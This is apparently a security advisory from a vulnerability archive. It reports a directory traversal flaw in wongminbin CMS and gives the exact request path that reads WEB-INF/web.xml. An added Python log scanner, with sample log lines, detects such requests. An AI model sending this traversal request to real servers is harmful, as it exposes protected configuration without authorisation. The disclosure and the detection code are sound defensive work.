wongminbin CMS Directory traversal Vulnerability

Published: 2016.12.30
Credit: Ashiyane Digital Security Team
Risk: Medium
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title : Directory traversal Vulnerability in wongminbin CMS
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor : https://github.com/wongminbin/CMS
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12/29/2016
|=============================================================|
|[+] Vuln Path : http://127.0.0.1/CMS-master/src/main/webapp/upload/../WEB-INF/web.xml?
|[+] Method : GET
|=============================================================|
|[+] Vulnerability description
|==============================|
|[+] This script is possibly vulnerable to directory traversal attacks.
|[+] Directory Traversal is a vulnerability which allows attackers to access restricted
|[+] directories and execute commands outside of the web server's root directory.
|[+] This vulnerability affects /cms-master/cms/src/main/webapp/upload.
|[+] Discovered by: Scripting (Server_Directory_Traversal.script).
|[+] Attack details
|[+] This file was found using the pattern ${dirName}/../WEB-INF/web.xml?.
|[+] Original directory: /CMS-master/src/main/webapp/upload
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
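
The request pattern reported above (`${dirName}/../WEB-INF/web.xml`) can be searched for in web server access logs. The following is an added detection example, not part of the original advisory or the wongminbin CMS code; the log lines are constructed samples and the function names are hypothetical. It resolves each request path and reports requests that land in WEB-INF or META-INF, noting whether the file was actually served.

```python
import posixpath
import re
from urllib.parse import unquote

# Directories a Java servlet container must never serve to clients.
PROTECTED = {"web-inf", "meta-inf"}
# Request line and status code of a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Dec/2016:10:00:01 +0000] "GET /CMS-master/src/main/webapp/upload/../WEB-INF/web.xml? HTTP/1.1" 200 1843',
    '192.0.2.10 - - [29/Dec/2016:10:05:01 +0000] "GET /CMS-master/src/main/webapp/upload/../WEB-INF/web.xml? HTTP/1.1" 404 210',
    '192.0.2.11 - - [29/Dec/2016:10:06:00 +0000] "GET /CMS-master/src/main/webapp/upload/logo.png HTTP/1.1" 200 5120',
    '192.0.2.12 - - [29/Dec/2016:10:07:00 +0000] "GET /CMS-master/src/main/webapp/css/../js/app.js HTTP/1.1" 200 900',
]


def resolve(target):
    """Return (normalised path, traversal_used) for a raw request target."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    # Logs may hold the percent-encoded form; decode until stable (max 3 rounds).
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    traversal = ".." in path.split("/")
    return posixpath.normpath("/" + path.lstrip("/")), traversal


def inspect_line(line):
    """Return a finding dict if the request resolves into a protected directory."""
    match = REQUEST_RE.search(line)
    if match is None:
        return None
    path, traversal = resolve(match["target"])
    if not PROTECTED.intersection(seg.lower() for seg in path.split("/")):
        return None
    status = int(match["status"])
    # A 2xx answer means the protected file was actually served.
    return {"path": path, "traversal": traversal, "status": status,
            "served": 200 <= status < 300}


def scan(lines):
    """Findings for every line that reaches WEB-INF or META-INF."""
    return [f for f in map(inspect_line, lines) if f is not None]
```

Findings with `served` set to true are the ones to triage first, since `web.xml` was returned to the client.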



Copyright 2017, cxsecurity.com